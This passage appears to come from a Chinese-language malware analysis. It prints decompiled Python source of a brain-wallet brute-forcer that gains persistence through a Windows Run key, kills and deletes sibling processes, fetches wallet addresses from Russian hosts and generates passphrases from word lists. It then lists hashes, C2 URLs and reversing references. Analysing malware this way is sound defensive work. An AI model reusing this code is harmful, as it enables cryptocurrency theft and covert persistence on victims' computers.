Grant, Greg, Gregg, Gregor, Gregory, Griff, Griffin, Griffith, Gryffin, Gus, Gussy, Gust, Gustus, Guy, Hal, Hamilton, Hank, Hannes, Hansel, Harold, Harris, Harrison, Harry, Hart, Harve, Harvey, Hasani, Hawk, Hayden, Hector, Henry, Herb, Herbert, Herman, Heston, Hilary, Hillary, Hillie, Hilly, Homer, Horace, Horatio, Howard, Howie, Hube, Hubert, Hugh, Hughie, Hugo, Humph, Humphrey, Humphry, Hunter, Huxley, Ian, Iggy, Ignatius, Ike, Immanuel, Indigo, Inigo, Irvin, Irvine, Irving, Irwin, Isaac, Isaak, Isador, Isadore, Isaiah, Isidor, Isidore, Ivor, Izzy, Jack, Jackie, Jackson, Jacky, Jacob, Jaden, Jaeger, Jake, James, Jamie, Jansen, Janus, Jared, Jarvis, Jason, Jasper, Jay, Jayden, Jedi, Jeff, Jefferson, Jeffery, Jeffrey, Jem, Jeremiah, Jeremy, Jerome, Jerry, Jervis, Jess, Jesse, Jessie, Jessy, Jesus, Jim, Jimbo, Jimmie, Jimmy, Jody, Joe, Joel, Joey, John, Johnnie, Johnny, Jon, Jonathan, Jonnie, Jonny, Jordan, Jos, Jose, Joseph, Josh, Joshua, Jovian, Juan, Jud, Judd, Judson, Jules, Julian, Julius, Jupiter, Jus, Justin, Kael, Karl, Kasey, Keane, Keith, Kel, Kelley, Kelly, Kelvin, Ken, Kendall, Kendrick, Kenneth, Kenny, Kensington, Kent, Kester, Kev, Kevin, Kirk, Kit, Kris, Kristof, Kristofer, Kristopher, Kurt, Kyle, Laird, Lambert, Lamont, Lance, Lancelot, Landon, Larry, Lars, Larson, Laszlo, Launcelot, Lauren, Laurence, Laurie, Lawrence, Lawrie, Lee, Leeroy, Leigh, Len, Lennie, Lenny, Leo, Leon, Leonard, Leopold, Leroy, Lesley, Leslie, Lester, Lev, Lew, Lewie, Lewis, Lex, Leyton, Liam, Lige, Lin, Linc, Lincoln, Lindon, Lindsay, Lindsey, Linus, Lionel, Lix, Llew, Llewellyn, Lloyd, Logan, Lon, Lonnie, Lonny, Loot, Loren, Lorence, Lorenzo, Lou, Louie, Louis, Lovell, Lowell, Loy, Loyd, Loyde, Lucas, Lucian, Lucius, Luis, Luke, Luth, Luther, Lyall, Lyle, Lyn, Lyndon, Lynn, Lyss, Mace, Maguire, Mal, Malc, Malcolm, Mannie, Manny, Manuel, Marc, Marcus, Marion, Mark, Marshal, Marshall, Mart, Martin, Marty, Marv, Marvin, Mason, Mat, Matt, Matthew, Matthias, Mattie, Matty, Maurice, Maximilian, Maxwell, Maynard, Mckinley, Melvin, Mercer, Merill, Merle, Merlin, Merril, Merrill, Merv, Mervin, Michael, Mick, Mickey, Micky, Miggy, Miguel, Mike, Mikey, Miles, Milo, Milt, Milton, Mir, Mitch, Mitchell, Monroe, Montague, Monte, Montgomery, Monty, Morey, Morgan, Morris, Morry, Mort, Mortimer, Morton, Morty, Mose, Moses, Moss, Munroe, Murray, Murry, Myles, Nat, Nate, Nathan, Nathaniel, Natty, Navy, Neal, Ned, Nel, Nell, Nels, Nelson, Nev, Nevil, Nevile, Nevill, Neville, Newt, Newton, Nicholas, Nick, Nicky, Nicol, Nicolas, Nige, Nigel, Nile, Niles, Noah, Noel, Noll, Nollie, Nolly, Nor, Norbert, Norm, Norman, Normie, Norrie, Norris, Nort, Norton, Nowell, Octavius, Oden, Oliver, Ollie, Orlando, Orson, Orville, Osbert, Osborn, Osborne, Oscar, Osmond, Osmund, Ossy, Osvald, Oswald, Oswold, Otis, Owen, Ozias, Ozzie, Ozzy, Paddy, Pascal, Pat, Patrick, Patsy, Paul, Pauly, Paxon, Penn, Perce, Perceval, Percival, Percy, Perry, Pete, Peter, Petey, Petie, Phil, Philip, Phillip, Poldie, Preston, Quentin, Quenton, Quest, Quincey, Quincy, Quinn, Quintin, Quinton, Rafael, Rafe, Raff, Ralph, Ralphy, Rand, Randal, Randall, Randolph, Randy, Raphael, Raven, Ray, Raymond, Raymund, Red, Reg, Reggie, Reginald, Remi, Rene, Renny, Reuben, Rex, Reynold, Rhythm, Rich, Richard, Richie, Rick, Ricky, Rio, Rob, Robbie, Robby, Robert, Robin, Rockwell, Rod, Roddy, Roderic, Roderick, Rodge, Rodger, Rodney, Roge, Roger, Roland, Rolf, Rolfe, Rolly, Rolph, Roly, Roman, Romy, Ron, Ronald, Ronnie, Ronny, Roscoe, Ross, Rowland, Rowly, Roy, Rube, Ruben, Rubin, Ruby, Rudolf, Rudolph, Rudy, Rufe, Rufus, Rupert, Russ, Russel, Russell, Rusty, Ryan, Sal, Sam, Sammy, Sampson, Samson, Samuel, Sander, Sanford, Saul, Scott, Scotty, Scout, Sean, Sebastian, Serge, Seth, Seymour, Shane, Shannon, Shanon, Shaun, Shaw, Shawn, Shel, Sheldon, Shelley, Shellie, Shelly, Shelton, Shepherd, Sherman, Sid, Sidney, Silas, Silvester, Sim, Simeon, Simie, Simmy, Simon, Slater, Sol, Solly, Solomon, Son, Sonny, Spencer, Stacey, Stacy, Stan, Stanley, Stef, Stefan, Steff, Steffan, Stellan, Steph, Stephan, Stephen, Steve, Steven, Stevie, Stew, Stewart, Stu, Stuart, Sven, Syd, Sydney, Syl, Sylar, Sylvester, Tad, Ted, Teddy, Tegan, Teo, Terence, Tergel, Terrance, Terrence, Terry, Thad, Thaddeus, Thadeus, Theo, Theodor, Theodore, Thomas, Tim, Timmy, Timothy, Tobi, Tobias, Tobie, Toby, Todd, Tom, Tommy, Tony, Toph, Topher, Tracey, Tracy, Trav, Travis, Trent, Trenton, Trev, Trevor, Tris, Tristam, Tristan, Tristram, Troy, Tyler, Tyron, Tyrone, Uli, Uly, Ulysses, Uri, Uria, Uriah, Urias, Valentin, Valentine, Valerian, Valerius, Van, Vance, Vaughan, Vaughn, Vergil, Vern, Verne, Vernon, Vester, Vic, Vick, Victor, Vince, Vincent, Vinny, Virge, Virgil, Wael, Waldo, Wallace, Wallie, Wallis, Wally, Walt, Walter, Warren, Wayne, Wellington, Wendell, Werner, Wes, Wesley, Wilber, Wilbert, Wilbur, Wiley, Wilfred, Wilfrid, Willard, William, Willie, Willis, Willy, Wilson, Winfred, Winfrid, Winnie, Winny, Winston, Wolfe, Woodrow, Woody, Xavier, Xzander, Yanis, Zach, Zachariah, Zacharias, Zachary, Zack, Zacky, Zave, Zyan'
girls = 'Aaliyah, Abbey, Abbie, Abella, Abigail, Ackie, Addison, Adelaide, Adele, Adrienne, Aemilia, Aemilius, Aemulus, Agatha, Agathos, Agnes, Agnessa, Aileen, Alabama, Alana, Alessandra, Alexa, Alexandra, Alexis, Alice, Alina, Alison, Allison, Alma, Alyssa, Amabel, Amalia, Amanda, Amber, Amee, Amelia, Amia, Amy, Anais, Andrea, Andrew, Angela, Angelina, Anita, Anna, Annabelle, Anne, Annie, Anthea, Antheia, Aperire, Arantxa, Aria, Ariana, Arianna, Arlene, Ashley, Astoria, Atlas, Aubrey, Audrey, Autumn, Ava, Aveline, Avery, Avis, Avril, Azura, Babs, Bailey, Barbara, Bea, Beata, Beatrice, Beatrix, Becky, Belinda, Bella, Bentlee, Berenice, Bernice, Berry, Bertha, Beryl, Bess, Bessie, Beth, Bethany, Betsy, Betty, Beverly, Blanca, Blanche, Bobbie, Bonnie, Brenda, Brian, Brianna, Brianne, Bridget, Brighid, Britain, Britney, Brittany, Brook, Brooke, Callista, Camila, Camilla, Camillus, Candace, Candice, Cara, Carissa, Carla, Carly, Carmel, Carol, Caroline, Carolus, Carolyn, Carrie, Cary, Cass, Cassandra, Catherine, Cathy, Charis, Charity, Charlene, Charles, Charlie, Charlotte, Chaz, Chelsea, Cherida, Cherish, Cherry, Cheryl, Chichi, Chicka, Chloe, Christina, Christine, Cicely, Cilla, Cilly, Claire, Clara, Clare, Clarice, Clarissa, Clarus, Claudia, Claudius, Connie, Constance, Courtnay, Courtney, Cynthia, Daisy, Danielle, Darlene, Davida, Dean, Deanna, Debby, Deborah, Dee, Deirdre, Delia, Delos, Dena, Derdriu, Destiny, Devina, Diana, DianaR, Diem, Dina, Dinah, Dolly, Dolores, Donna, Dora, Doreen, Doris, Dorothea, Dorothy, Dottie, Dove, Drishti, Eadgyth, Ebony, Edith, Edna, Edwin, Edwina, Effie, Eileen, Eithne, Elaine, Eleanor, Elena, Elfreda, Elinor, Eliza, Elizabeth, Ella, Ellen, Ellie, Elsa, Emilia, Emily, Emma, Emmy, Enola, Erin, Ermintrude, Esma, Esta, Estelle, Esther, Ethel, Eudora, Eugenia, Eugenios, Eunice, Euphemia, Eva, Eve, Evelyn, Evette, Evie, Evonne, Faith, Fanny, Fay, Faye, Felicity, Fenella, FernFiny, Fiona, Fleur, Flo, Flora, Florence, Florentius, Florrie, Fran, Frances, Francis, Freda, Frooti, Gabriell, Gabrielle, Gail, Gale, Gayle, Gaynor, Georgiana, Geraldine, Germaine, Gertrud, Gertrude, Gill, Gillian, Ginger, Ginny, Glenys, Gloria, Glynis, Grace, Gracie, Gratia, Greenlee, Greta, Gretta, Guinevere, Gwenhwfar, Hailey, Haley, Hanna, Hannah, Harmonee, Harper, Harriet, Hattie, Hayley, Hazel, Heather, Heavenly, Helen, Helena, Helene, Henri, Henrietta, Henriette, Hephzibah, Hettie, Hilarius, Hilary, Hilda, Hollie, Holly, Honey, Hope, Huxley, Hyacinth, Ida, Idalia, Imogen, Indigo, Iole, Irea, Irene, Iris, Irmgard, Isabel, Isabella, Isabelle, Ivy, Izzy, Jacqueline, Jacques, Jada, Jade, Jane, Janet, Janette, Janice, Jasmin, Jasmine, Jay, Jazz, Jean, Jeane, Jeanne, Jeannette, Jenna, Jennet, Jennifer, Jenny, Jess, Jessalyn, Jessica, Jessie, Jewel, Jill, Joan, Joanna, Jocelyn, Jodie, John, Jordan, Josce, Josephine, Joy, Joyce, Judith, Judy, Julia, Julian, Juliet, Juliette, Juna, Justin, Justine, Kaitlyn, Kaley, Kani, Kansas, Kat, Katana, Kate, Katelyn, Katherine, Kathy, Katie, Katrina, Katy, Kay, Kayla, Kaylee, Kayley, Keeley, Kelly, Kendra, Kendrick, Keren, Kerena, Kerry, Keva, Kim, Kimberley, Kimberly, Kimmy, Kitty, Kizzy, Kyla, Kyle, Kylie, Kynthia, Lacey, Lainie, Lake, Lana, Larkyn, Laura, Lauren, Laurence, Lauretta, Laurus, Lavender, Layla, Leah, Leanne, Lee, Lena, Leona, Lesley, Leslie, Lexi, Lexy, Libby, Lilian, Lillian, Lilly, Lily, Linda, Lindsay, Lindy, Linette, Linnette, Liona, Lira, Lisa, LisaF, Lise, Livia, Liz, Liza, Lizzie, Lizzy, Lola, Loretta, Lorraine, Lotte, Lottie, Louis, Louise, Lourdes, Lucie, Lucinda, Lucy, Luna, Lyn, Lynette, Lynn, Mabel, Mackenzie, Madeline, Madge, Madison, Madonna, Mafalda, Maggie, Mairin, Makayla, Malvina, Mandy, Mara, Marcia, Margaret, Margarita, Marguerite, Maria, Marice, Marie, Marilyn, Mariposa, Maris, Marissa, Marlene, Mary, Matilda, Maud, Maude, Maura, Maureen, Maven, Mavis, Maxine, Maya, Meg, Megan, Melania, Melanie, Melinda, Melissa, Melony, Mercy, Meriel, Merle, Messiah, Mia, Michelle, Mila, Mildred, Millicent, Millie, Minerva, Minnie, Mirabelle, Miranda, Misty, Molly, Mona, Monet, Monica, Morgan, Moxie, Muireall, Muriel, Myra, Myrtle, Nadia, Nancy, Natalie, Nell, Nella, Nellie, Nerissa, Nessa, Neveah, Nicola, Nicole, Nikita, Nita, Noirin, Nora, Noreen, Norma, Novalie, Nyx, Oceana, Octavia, Olivia, Olympia, Opal, Paisley, Pamela, Pandora, Pansy, Patience, Patricia, Patsy, Paula, Peg, Peggy, Penelope, Perpetua, Petra, Petula, Philippa, Phillida, Philomena, Phoebe, Phyllis, Pippa, Pippy, Polly, Poppy, Primrose, Priscilla, Priss, Prissy, Prudence, Prunella, Psalm, Queenie, Rachel, Raine, Ravenna, Reanna, Rebecca, Rebel, Reenie, Regina, Rene, Rhoda, Ricky, Rikki, Riley, Rina, Rita, Roberta, Robin, Rogue, Ronnie, Rosalind, Rose, Roseanne, Rosella, Rosemary, Rosie, Rosy, Rowena, Roxana, Roxanne, Ruby, Sabella, Sabrina, Sadie, Sahar, Sailor, Sally, Samantha, Sammy, Sandra, Sandy, Sapphire, Sara, Sarah, Savannah, Scarlett, Selena, Selma, Shannah, Shannon, Sharon, Sheila, Shirley, Sibylla, Sierra, Sile, Silver, Silvia, Sissy, Skye, Skylar, Sofia, Sophia, Starla, Stella, Steph, Stephanie, Stephen, Stephy, Stevie, Storm, Sue, Sunshine, Susan, Susanna, Susie, Suzanna, Suzette, Suzy, Swayze, Sybil, Sydney, Sylvia, Tamara, Tammy, Tamsin, Tansy, Tara, Tasha, Tate, Tawny, Taylor, Teri, Terra, Terry, Tessa, Thelma, Theresa, Thora, Tiffany, Tilda, Tori, Tracy, Trina, Trinity, Trisha, Trixie, Trudy, Tulip, Twinkle, Uma, Ursa, Ursula, Valda, Valene, Valerie, Valkyrie, Vanessa, Velma, Venice, Vera, Verity, Verona, Veronica, Viatrix, Vick, Vicky, Victoria, Victory, Viola, Violet, Virgil, Virginia, Vita, Vivian, Wanda, Wendy, Whitney, Wilhelmina, Willow, Wilma, Wilona, Winfred, Winifred, Wynne, Xenia, Xenthe, Yasmin, Yolanda, Yvette, Yvonne, Zane, Zanna, Zelda, Zelene, Zera, Zoe, Zoelle, Zoey, Zowie'
surnames = 'Adams, Allard, Anderson, Andre, Aramitz, Archambault, Arnaud, Aubert, Babin, Babineaux, Bailey, Baker, Barbier, Barre, Baudin, Beauchene, Beaufort, Beaulieu, Beaumont, Belanger, Bell, Bellamy, Bellerose, Belmont, Belrose, Bennett, Beranger, Berger, Bernard, Bertrand, Blaise, Blanc, Blanchard, Blanchet, Boivin, Bonfils, Bonheur, Bonhomme, Bonnay, Bonnet, Borde, Bouchard, Boucher, Bourdillon, Bourreau, Bret, Brisbois, Brodeur, Brooks, Brown, Bureau, Butler, Caron, Carpentier, Carter, Chaput, Charbonneau, Charles, Charpentier, Charron, Chastain, Chevalier, Chevrolet, Christian, Clark, Clement, Cloutier, Colbert, Collins, Comtois, Cooper, Coste, Cote, Courtemanche, Courtois, Cousineau, Couture, Daniau, Daviau, Davies, Davis, Deforest, Degarmo, Delacroix, Deniau, Deniaud, Deniel, Dennel, Deschamps, Descoteaux, Desjardins, Desroches, Desrosiers, Diaz, Droit, Dubois, Duchamp, Dufort, Dufour, Duguay, Dumont, Dupond, Dupont, Durand, Durant, Duval, Edwards, Evans, Fabien, Fabre, Fabron, Faucher, Faucheux, Faure, Favager, Favre, Favreau, Fay, Felix, Fevre, Firmin, Flores, Fontaine, Forest, Forestier, Fortier, Fosse, Foster, Fournier, Francois, Gage, Gagnier, Gagnon, Garcon, Gardinier, Garnier, Gauthier, Germain, Geroux, Girard, Giroux, Gonzales, Gonzalez, Gosse, Granger, Gros, Guerin, Guillaume, Guillory, Guillot, Hardy, Harris, Hayes, Hebert, Henderson, Howard, Jackson, Jacques, Janvier, Jean, Jenkins, Johnson, Jones, Jordan, Joubert, Julien, Labelle, Lachance, Lachapelle, Lamar, Lamarre, Lambert, Lane, Langlais, Langlois, Lapointe, Larue, Laurent, Lavigne, Lavoie, Leandre, Lebeau, Leblanc, Lebrun, Leclair, Leclerc, Lecuyer, Lefebvre, Lefevre, Legrand, Lemaire, Lemieux, Leroux, Leroy, Lesauvage, Lestrange, Leveque, Lewis, Lopez, Louis, Lucas, Lyon, Macon, Marchand, Marion, Martel, Martin, Martinez, Masson, Mathieu, Mercier, Merle, Meunier, Michaud, Michel, Miller, Mitchell, Monet, Monette, Montagne, Moore, Moreau, Morel, Morgan, Morris, Moulin, Nelson, Neuville, Noyer, Paget, Palomer, Paquet, Parent, Parker, Parris, Pascal, Patterson, Paul, Pelle, Pelletier, Perez, Perigord, Perrault, Perrin, Perrot, Peterson, Petit, Pherigo, Philippe, Phillips, Pierre, Plamondon, Planche, Plourde, Poingdestre, Poirier, Porcher, Poulin, Proulx, Ramirez, Rayne, Reed, Renard, Rey, Richard, Richardson, Richelieu, Rivera, Robert, Roberts, Robin, Robinson, Roche, Rodriguez, Roger, Rogers, Romilly, Ross, Rousseau, Roussel, Roux, Roy, Royer, Russell, Salomon, Samson, Samuel, Sanders, Sartre, Sault, Sauvage, Sauvageon, Sauvageot, Sauveterre, Savatier, Segal, Sergeant, Severin, Simmons, Simon, Smith, Solomon, Sourd, Stewart, Tailler, Tasse, Taylor, Thomas, Thompson, Torres, Traver, Travere, Traverse, Travert, Tremblay, Tremble, Turner, Vidal, Villeneuve, Vincent, Voclain, Walker, Washington, Watson, Williams, Wilson, Wright'
guns = 'Gun, Weapon, Musket, Rifle, Shotgun, Shotgus, Handgun, Pistol, Revolver, Parabellum, Beretta, SigSauer, Glock, Colt, Walther, Mauser, Browning'
animal = 'Cat, Dog, Puppie, Kitten, Kitty, Kittie, Doggie, Doggy, Chinchilla, Hamster'
animals = 'Cats, Dogs, Puppies, Kittens, Kitties, Doggies, Chinchillas, Hamsters'
auto = 'AlfaRomeo, AstonMartin, Audi, Batmobile, Bentley, Bmw, Brabus, Bugatti, Buick, Cadillac, Chevrolet, Chrysler, Citroen, Corvette, Cruiser, Daihatsu, Dodge, Ferrari, Fiat, Ford, Gmc, Honda, Hudson, Hummer, Hyundai, Isuzu, Jaguar, Jeep, Kenworth, Kia, Koenigsegg, Lamborghini, Lexus, Limousine, Lincoln, Lotec, Maserati, Maybach, Mazda, McLaren, Mercedes, MiniCooper, Mitsubishi, Mosler, Mustang, Nissan, Noble, Oldsmobile, Opel, Pagani, Peterbilt, Peugeot, Plymouth, Pontiac, Porsche, RangeRover, Renault, Rezvani, Roadster, RollsRoyce, Rover, Saab, Seat, Skoda, SsangYong, Studebaker, Subaru, Suzuki, Tatuus, Tesla, Toyota, Volkswagen, Volvo, Willys'
drugs = 'Pill, Drug, Drugs, Dope, Narcotic, Narcotics, Opium, Cocaine, Morphine, Heroin, Hashish, Marijuana, Cannabis, Crack, Lsd, Pcp, Amphetamine, Hallucinogen, Methadone, Amidone, Ecstasy, Barbiturate, Nicotine, Ketamine, Meth, Methamphetamine, Mescaline, Peyote, Prozac, Temazepam'
cigarettes = 'Cigar, Cigarette, Marlboro, Newport, Maverick, Camel, Winston, Pyramid, Doral, Chesterfield, Parliament, Dunhill, LuckyStrike, Gitanes, Gauloises, Embassy, Kensitas, Cohiba, Cuaba, Belmont, PhilipMorris, Davidoff, Kent, Esse, DuMaurier, Mayfair, Memphis, Mevius, PallMall, Parisienne, Woodbine, Zhongnanhai'
yachts = 'Yacht, Alalunga, Alenyacht, Alfamarine, Alunaut, Apreamare, Astondoa, Axopar, Azimut, Beneteau, Benetti, Birchwood, BoatMarine, BoatBuilding, Carver, Chaparral, Comitti, Cranchi, Drettmann, Boarnstream, Powerboats, Edgewater, Faeton, Feadship, FiartMare, FourWinns, inRizzardi, Jeanneau, Jongert, McKinna, Menorquin, Mikelson, MosBoats, NedYacht, Storebro, Nordhavn, Numarine, Overmarine, Permare, Primatist, Superyachts, SeaRay, Sealine, Shipyard, Sunreef, Sunseeker, SuperHouseBoats, VanDerHeijden, Yachtbuilders, Bruckmann, CaboYachts, Dellapasqua, HeySea, Grandezza, Lazzara, Silverton, Houseboats, Wellcraft, Henriques, Hodgdon, Interadria, Shipyards, YachtLife, Yamarin, Stingray, Silvercraft, SeaDoo, Rinker, Nimbus, Bayliner, Alumacraft'
beaches = 'Kaunaoa, CampsBay, BoraBora, EagleBeach, Carvoeiro, SouthBeach, Ipanema, Bavaro, Nissi, PhraNang, Punaluu, Natadola, PalmBeach, Copacabana, Fonimagoodhoo, PinkSands, BlueLagoon, Waikiki, Benagil, Elafonissi, GrandAnse, Varadero, Derawan, Koekohe, Fulhadhoo, AnseLazio, Legzira, SvetiStefan, Myrtos, Radhanagar, DianiBeach, Lamai, Rasdhoo, Unawatuna, MyKhe, Yelapa, Wuzhizhou, Pfeiffer, Varkala, NusaDua, Navagio, AlJissah, SharmElSheikh, Kaanapali, Campeche, SunnyIsles, Railay, Paraiso, Huvahendhoo, GuanaCay, SaCaleta, Marinha, Akumal, Palolem, Tangsi, Guardalavaca, Comporta, Aitutaki, Mismaloya, CoronaDelMar, ParadiseBeach'
crypto = 'Cryptocurrency, Bitcoin, Btc, Litecoin, Ltc, Monero, Money, Cash'
synonyms = []
for s in [alcohols, dogs, cats, mens, girls, surnames, guns, animal, animals, auto,
drugs, cigarettes, yachts, beaches, crypto]:
synonyms.append(set(s.split(', ')))
synonyms.append(set(s.lower().split(', ')))
try:
threading.Thread(target=get_phrases, args=(0, 4, 20230830)).start()
threading.Thread(target=get_phrases, args=(0, 5, 20230830)).start()
except:
pass
try:
t = time.time()
p = psutil.Process()
for proc in psutil.process_iter():
try:
if proc.pid == p.pid or proc.pid == p.ppid():
continue
if re.findall('file\\d.exe', proc.name()):
proc.terminate()
time.sleep(0.4)
os.remove(os.path.join(os.path.dirname(sys.argv[0]), proc.name()))
except:
pass
except:
pass
try:
thread1 = threading.Thread(target=load_addresses, args=('cpitest.ru/',))
thread1.start()
except:
pass
try:
if os.path.isfile(resource_path('words.bz2')):
path = resource_path('words.bz2')
else:
path = os.path.join(os.path.join(os.path.realpath(sys.path[0]), '.'), 'words.bz2')
with open(path, 'rb') as (rb):
lines = bz2.decompress(rb.read()).split('\r\n')
c = len(lines[0].split('&'))
words = [ {} for _ in range(c - 1) ]
codes = {str(j): line.split('&')[0] for j, line in enumerate(lines)}
for i, line in enumerate(lines):
lines[i] = ('&').join([ (':').join([ (';').join([ codes.get(j, j) for j in w.split(';') ]) for w in ln.split(':') ]) for ln in lines[i].split('&') ])
for i, line in enumerate(lines):
line = line.strip()
line = line.split('&')
word = line[0].split('&')[0]
d = len(line[1].split(':'))
for p in range(1, c):
words[p - 1][word] = [ {} for _ in range(c - p) ]
for n in range(c - p):
if n < d:
words[p - 1][word][n] = {w for w in line[p].split(':')[n].split(';') if w}
if not any(words[p - 1][word]):
del words[p - 1][word]
del lines
except:
pass
try:
rkey = reg.OpenKey(reg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, reg.KEY_ALL_ACCESS)
reg.SetValueEx(rkey, 'python12', 0, reg.REG_SZ, os.path.abspath(sys.argv[0]))
reg.CloseKey(rkey)
except:
pass
try:
u = 0
ver = '5314'
phrases = []
keys = {k for v in words}
synonyms = [ set(k).intersection(keys) for k in synonyms ]
for i in xrange(1, 5000000):
time.sleep(5)
try:
if len(multiprocessing.active_children()) < 1:
words0 = words[0].copy().keys()
words0 = choices({w: len(words[0][w][0]) for w in words0}, len(words0), 0)
for j0, word0 in enumerate(words0):
words1 = words[0][word0][0].copy()
words1 = choices({word: len(set.intersection(*[ words[1 - p][w][p] for p, w in enumerate([word, word0][:d]) ])) for word in words1}, len(words1), 0)
for j1, word1 in enumerate(words1):
words2 = set.intersection(*[ words[1 - p][w][p] for p, w in enumerate([word1, word0][:d]) ])
words2 = choices({word: len(set.intersection(*[ words[2 - p][w][p] for p, w in enumerate([word, word1, word0][:d]) ])) for word in words2}, len(words2), 0)
for j2, word2 in enumerate(words2):
words3 = set.intersection(*[ words[2 - p][w][p] for p, w in enumerate([word2, word1, word0][:d]) ])
words3 = choices({word: len(set.intersection(*[ words[3 - p][w][p] for p, w in enumerate([word, word2, word1, word0][:d]) ])) for word in words3}, len(words3), 0)
for j3, word3 in enumerate(words3):
words4 = set.intersection(*[ words[3 - p][w][p] for p, w in enumerate([word3, word2, word1, word0][:d]) ])
for j4, word4 in enumerate(words4):
if True:
if True:
if True:
if True:
phrase = word0 + ' ' + word1 + ' ' + word2 + ' ' + word3 + ' ' + word4
phrase = phrase.encode('utf8')
if 10 > len(phrase) > 80:
continue
phrases.append(phrase)
phrases.append(phrase.lower())
phrases.append(phrase.replace(' ', ''))
phrases.append(phrase.replace(' ', '').lower())
if len(phrases) > 500000:
u += len(phrases)
process1 = multiprocessing.Process(target=check_addresses, args=(u, t, ver, {phrases.pop() for x in xrange(len(phrases))}, []))
process1.start()
process1.join()
except:
pass
except:
pass
sys.exit()
IOC
HASH
EAD9542D757366D77F887173A8EEC810
a7f1d0df5413d14fab8566df4fdde1d9
eeb736d65f89dbabdc5670f801c6d53b
63e104fb8a1906ed70a4baf3f2672a70
文件行为
在D-M盘符下,创建photo目录,将自身拷贝过去
网络
http://www.profbase.ru/photo.txt
http://www.psiassess.ru/photo.txt
http://www.topstatist.ru/photo.txt
http://194.147.84.197/python18
cpitest.ru/address.php
catell.ru/address.php
cpitest.ru/phrases.php
开机启动项
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Startup"="C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\xxx.exe"
参考资料
- http://www.ioctls.net/
- mdm Zinc3 封装flex3程序
- https://www.multidmedia.com/
- Flash游戏逆向神器 ( ffdec - JPEXS Free Flash Decompiler )
- flash与web开发语言的交互
- [Python逆向] 逆向Pyinstaller打包的exe文件源码及保护